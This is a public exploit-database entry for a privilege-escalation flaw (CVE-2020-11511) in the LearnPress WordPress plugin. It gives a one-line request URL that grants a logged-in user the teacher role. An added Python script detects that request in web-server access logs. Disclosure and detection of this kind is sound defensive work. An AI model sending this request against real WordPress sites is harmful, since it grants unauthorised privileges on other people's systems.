WordPress Plugin LearnPress 3.2.6.8 – Privilege Escalation

  • Author: nhattruong
    Date: 2021-07-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50138/
  • # Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
    # Date: 07-17-2021
    # Exploit Author: nhattruong or nhattruong.blog
    # Vendor Homepage: https://thimpress.com/learnpress/
    # Software Link: https://wordpress.org/plugins/learnpress/
    # Version: < 3.2.6.9
    # References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
    # CVE: CVE-2020-11511
    
    POC:
    1. Find out your user ID
    2. Log in with your credentials
    3. Execute the payload
    
    
    http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
    
    # Done!
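
A defender-side check for the request shown above, as an added example that is not part of the original exploit entry: it scans web-server access logs (Combined Log Format is assumed) for requests under `/wp-admin` that carry `action=accept-to-be-teacher`, and reports the client IP, time, status and `user_id` values. The function name, the regex and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
ACTION = "accept-to-be-teacher"  # action value taken from the PoC URL


def find_role_requests(lines):
    """Return one dict per logged request that carries the PoC's action parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        url = urlsplit(m["target"])
        if "/wp-admin" not in url.path:  # also covers installs in a subdirectory
            continue
        # parse_qs percent-decodes values and ignores parameter order
        query = parse_qs(url.query, keep_blank_values=True)
        if ACTION not in query.get("action", []):
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "status": int(m["status"]),
            "user_ids": query.get("user_id", []),
        })
    return hits


# Constructed sample log lines (documentation IP ranges, not from a real server)
SAMPLE = [
    '203.0.113.7 - - [19/Jul/2021:10:01:02 +0000] "GET /wp-admin/?action=accept-to-be-teacher&user_id=12 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Jul/2021:10:01:09 +0000] "GET /wp-admin/?user_id=12&action=accept%2Dto%2Dbe%2Dteacher HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [19/Jul/2021:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 48 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [19/Jul/2021:10:03:00 +0000] "GET /courses/?q=accept-to-be-teacher HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_role_requests(SAMPLE):
        print(hit)
```

Each hit is a lead to review: check the current role of the listed user IDs, and confirm the installed LearnPress version against the affected range given above (< 3.2.6.9).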